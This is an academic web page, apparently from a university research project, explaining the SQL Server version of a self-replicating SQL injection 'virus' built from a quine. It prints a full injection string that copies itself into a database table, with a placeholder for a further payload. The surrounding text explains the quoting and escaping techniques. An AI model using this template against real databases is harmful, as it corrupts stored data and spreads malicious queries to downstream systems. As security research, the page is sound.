logo
Go to the homepage of the Vrije Universiteit. Go to the homepage of the faculty of sciences.

SQL Virus Using Quines for SQL Server


The SQL Server exploit (Exploit  1) is functionally similar to the MySQL version. The differences are explained below.
%content%' WHERE TagId='%id%';

DECLARE @a varchar(1024);

SET @a='UPDATE ContainerContents SET NewContents=''%content%'''' WHERE TagId=''''%id%''''; DECLARE @a varchar(1024); SET @a='''''' + REPLACE(@a, '''''''', '''''''''''') + ''''''; '' + @a; %payload%; --';

UPDATE ContainerContents SET NewContents='%content%'' WHERE TagId=''%id%''; DECLARE @a varchar(1024); SET @a=''' + REPLACE(@a, '''', '''''') + '''; ' + @a; %payload%; --
Exploit  1 - SQL Server exploit. Whitespace is for readability only.

Like MySQL, SQL Server supports variables. However, on SQL Server variables must be declared before they are used. This happens in the second line. The declaration is also added to the last line, so it is copied to the database. It is also stored in the variable, as this contains the last line.

MySQL uses a backslash to escape quotes in strings (\'). SQL Server uses two single quotes for this purpose.

MySQL provides the functions CONCAT and QUOTE to concatenate strings and escape the quotes in them.
SQL Server does not provide these functions, so the string concatenation operator + is used to concatenate strings.
The REPLACE function is used to escape strings, by replacing each quote with two quotes. This differs slightly from MySQL's QUOTE function, as that also encloses the string in quotes. To compensate for this, the quotes are added explicitly.


Up SQL Virus Using Quines
SQL Virus Using Quines for PostgreSQL Next

Last modified: Thursday, 02 March 2006 21:36, CET
If you spot a mistake, please e-mail the maintainer of this page.
Your browser does not fully support CSS. This may result in visual artifacts.